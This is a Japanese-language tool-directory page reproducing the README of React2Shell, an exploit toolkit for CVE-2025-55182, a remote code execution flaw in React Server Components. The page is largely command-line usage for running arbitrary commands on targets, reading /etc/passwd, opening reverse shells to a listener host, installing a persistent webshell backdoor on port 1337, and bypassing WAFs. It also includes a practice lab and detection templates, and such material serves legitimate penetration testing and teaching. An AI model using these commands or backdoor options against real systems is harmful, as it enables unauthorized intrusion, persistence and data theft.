Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
React2Shell — CVE-2025-55182 セキュリティテストキット: CLI scanner + Chrome extension + Nuclei templates + Docker lab. | Kitploit
ツール/GitHubGitHub/sho-luv/react2shell
脆弱性スキャナーエクスプロイトフレームワークウェブアプリケーション悪用WAFバイパスウェブセキュリティCTFペネトレーションテスト学習と教育ペイロード開発ラボと実践
GitHubsho-luv/react2shell

React2Shell

9239ヶ月前未レビュー

CVE-2025-55182 セキュリティテストキット: CLI scanner + Chrome extension + Nuclei templates + Docker lab.

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

React2Shell

CVE-2025-55182 Scanner & Exploit Toolkit for Next.js/React Server Components RCE.

リポジトリ構成

root@kitploit:~
React2Shell/
├── browser-extension/    # Chrome拡張機能(ブラウザベースの検出)
│   ├── manifest.json
│   ├── content.js
│   ├── popup.html/js
│   └── background.js
├── cli/                  # コマンドラインスキャナー&エクスプロイトツール
│   ├── react2shell.py
│   └── requirements.txt
├── docs/                 # 学習向けドキュメント
│   ├── README.md         # 学習パスのインデックス
│   ├── 01-fundamentals.md
│   ├── 02-vulnerability.md
│   ├── 03-exploitation.md
│   ├── 04-frameworks.md
│   └── 05-defense.md
├── lab/                  # テスト用Dockerラボ環境
│   ├── vulnerable/       # 脆弱なNext.jsアプリ(React 19.2.0)
│   ├── patched/          # 修正済みNext.jsアプリ(React 19.2.1)
│   ├── waf/              # ModSecurity WAFコンテナ
│   ├── waku-app/         # 脆弱なWakuアプリ(React 19.2.0)
│   ├── react-router-app/ # 脆弱なReact Routerアプリ(React 19.2.0)
│   └── docker-compose.yml
└── nuclei/               # Nucleiテンプレート
    ├── CVE-2025-55182.yaml       # RCE検出(コード実行)
    └── CVE-2025-55182-safe.yaml  # 安全なサイドチャネル検出

クイックスタート

CLIツール

root@kitploit:~
cd cli
pip install -r requirements.txt

# ターゲットをスキャン
python react2shell.py https://target.com

# コマンド実行
python react2shell.py https://target.com -c "id"

# インタラクティブシェル
python react2shell.py https://target.com -i

ブラウザ拡張機能

  1. chrome://extensions/ を開く
  2. 「デベロッパーモード」を有効にする
  3. 「パッケージ化されていない拡張機能を読み込む」をクリック
  4. browser-extension ディレクトリを選択

ラボ環境

root@kitploit:~
cd lab
docker-compose up -d

# 悪用可能なターゲット:
# Next.js 脆弱:          http://localhost:3011  ← 完全なRCE
# Waku 脆弱:             http://localhost:3014  ← RCE(ブラインド - HTTP出力なし)
# React Router:          http://localhost:3015  ← 完全なRCE(ESM)

# 保護されたターゲット:
# Next.js 修正済み:      http://localhost:3012  ← 安全
# WAF 保護:              http://localhost:3013  ← ModSecurityがエクスプロイトをブロック

Nucleiスキャナー

root@kitploit:~
nuclei -t nuclei/CVE-2025-55182.yaml -u https://target.com

機能

CLIツール (cli/react2shell.py)

  • マルチフレームワーク対応 - Next.js, Waku, React Router, Expo, Vite RSC, Parcel RSC
  • フレームワーク検出 (--detect) - ターゲットのフレームワークを自動検出
  • エンドポイント列挙 (-E) - RSCエンドポイントを自動発見
  • 脆弱性スキャン - 単一URLまたはファイルからのバッチスキャン
  • コマンド実行 (-c) - 任意のコマンドを実行
  • インタラクティブシェル (-i) - 持続的なコマンドセッション
  • リバースシェル (-r) - 複数タイプ: nc, bash, perl, python, ruby
  • インメモリウェブシェル (--webshell) - 持続的なバックドアのインストール
  • ファイル読み取り (-f) - リモートファイルを直接読み取り
  • ローカルスキャン (-L) - package.jsonをチェックして脆弱なバージョンを特定
  • WAFバイパス - ジャンクパディング (-w)、Unicodeエンコード (-u)、Vercel固有 (-V)
  • プロキシ対応 (-x) - Burp Suiteなどのプロキシ経由でルーティング
  • セーフモード (-s) - コード実行なしのサイドチャネル検出

ブラウザ拡張機能 (browser-extension/)

  • RSC脆弱性の指標を自動検出
  • 設定可能なエクスプロイトパス
  • コマンド実行と出力表示
  • 有効/無効の切り替え
  • 脆弱/安全を示す視覚的なインジケーター

ラボ環境 (lab/)

  • 脆弱なNext.js (3011) - X-Action-Redirectによる完全なRCE(出力あり)
  • Waku (3014) - RCE確認済み、/RSC/F/{x}/{y}.txt パス形式が必要
  • React Router (3015) - ESM互換の process.getBuiltinModule() を使用した完全なRCE
  • 修正済みNext.js (3012) - エクスプロイトなしでの検出テスト用
  • WAF保護 (3013) - バイパス研究用のModSecurityルール
  • ダッシュボード (8080) - 攻撃ログと可視化

CLI使用例

root@kitploit:~
# 基本スキャン(フレームワークを自動検出)
python react2shell.py https://target.com

# フレームワークを検出し、エンドポイントを列挙
python react2shell.py https://target.com --detect
python react2shell.py https://target.com -E -v

# 異なるフレームワークでコマンド実行
python react2shell.py https://target.com -c "id"                    # Next.js(自動)
python react2shell.py https://target.com -F waku -c "id"            # Waku(ブラインドRCE)
python react2shell.py https://target.com -F react-router -c "id"    # React Router(ESM)

# ラボでの例(出力あり)
python react2shell.py http://localhost:3011 -c "cat /app/secret/flag.txt"  # Next.js
python react2shell.py http://localhost:3015 -F react-router -c "id"        # React Router

# すべてのWAFバイパスを使用してコマンド実行
python react2shell.py https://target.com -c "cat /etc/passwd" -w -u

# プロキシ経由でインタラクティブシェル
python react2shell.py https://target.com -i -x http://127.0.0.1:8080

# インメモリウェブシェルのインストール(ポート1337にバックドアを作成)
python react2shell.py https://target.com --webshell mypassword
# アクセス: curl 'http://target:1337/?p=mypassword&cmd=id'

# リバースシェル
python react2shell.py https://target.com -r -l 10.0.0.1 -p 4444 -S bash

# ローカルプロジェクトの脆弱なバージョンをスキャン
python react2shell.py -L /path/to/project

# バッチスキャン(出力付き)
python react2shell.py targets.txt -t 20 -o results.json -v

すべてのCLIオプション

root@kitploit:~
実行オプション:
  -c, --cmd             実行するコマンド
  -i, --interactive     インタラクティブシェルセッション
  -r, --reverse         リバースシェルモード
  -l, --lhost           リスナーホスト
  -p, --lport           リスナーポート
  -S, --shell-type      シェルタイプ(nc, nc-mkfifo, bash, perl, python, ruby)
  -f, --read-file       リモートファイルを読み取る

スキャンオプション:
  -P, --path            テストするパス(カンマ区切りまたはファイル)
  -t, --threads         スレッド数(デフォルト: 10)
  -T, --timeout         リクエストタイムアウト(秒)(デフォルト: 10)
  -s, --safe            セーフモード(コード実行なし)
  -L, --local           ローカルプロジェクトディレクトリをスキャン
  -F, --framework       ターゲットフレームワーク(auto, nextjs, waku, react-router, expo)
  -E, --enumerate       エクスプロイト前にRSCエンドポイントを列挙
  --detect              フレームワークのみ検出し、エンドポイントを一覧表示
  --webshell            ポート1337にインメモリウェブシェルをインストール
  --rce                  RCE概念実証モード(デフォルト: セーフモード)

バイパスオプション:
  -w, --waf-bypass      ジャンクデータパディング
  -W, --waf-size        ジャンクサイズ(KB)(デフォルト: 128)
  -u, --unicode         Unicodeエンコーディングによるバイパス
  -V, --vercel-bypass   Vercel固有のバイパス
  --windows             Windows PowerShellペイロード

リクエストオプション:
  -x, --proxy           プロキシURL(例: http://127.0.0.1:8080)
  -H, --header          カスタムヘッダー
  -A, --user-agent      カスタムUser-Agent
  -k, --insecure        SSL検証を無効化

出力オプション:
  -o, --output          結果をJSONに保存
  -v, --verbose         バージョン検出を含む詳細出力
  -q, --quiet           脆弱なターゲットのみ表示
  --no-color            色を無効化
  --no-banner           バナーを非表示

CVE-2025-55182 詳細

フィールド値
CVSS10.0(Critical)
影響認証不要のリモートコード実行
影響を受ける対象脆弱なReactバージョンを使用するすべてのRSCフレームワーク
メカニズムReact Flight Protocolを介したプロトタイプ汚染

影響を受けるフレームワーク

フレームワーク脆弱なバージョン修正済みバージョン
React19.0.0 - 19.2.019.2.1+
Next.js14.0.0 - 15.4.715.4.8+
Waku< 0.27.20.27.2+
React Router7.0.0 - 7.5.0(RSCプレビュー)7.5.1+
Expo実験的なRSCReactの更新
@vitejs/plugin-rsc脆弱なReactを使用するすべてのバージョンReactの更新
@parcel/rsc脆弱なReactを使用するすべてのバージョンReactの更新
RedwoodJS(rwsdk)脆弱なReactを使用するすべてのバージョンReactの更新

クレジット

  • mrknow001/RSC_Detector
  • assetnote/react2shell-scanner
  • Chocapikk/CVE-2025-55182
  • hackersatyamrastogi/react2shell-ultimate
  • ProjectDiscovery Nuclei Templates

免責事項

このツールキットは認可されたセキュリティテスト専用です。自分が所有するシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください。コンピュータシステムへの不正アクセスは違法です。


CVE-2025-55182 | CVSS 10.0 | 認可されたセキュリティテスト専用

ツールをダウンロード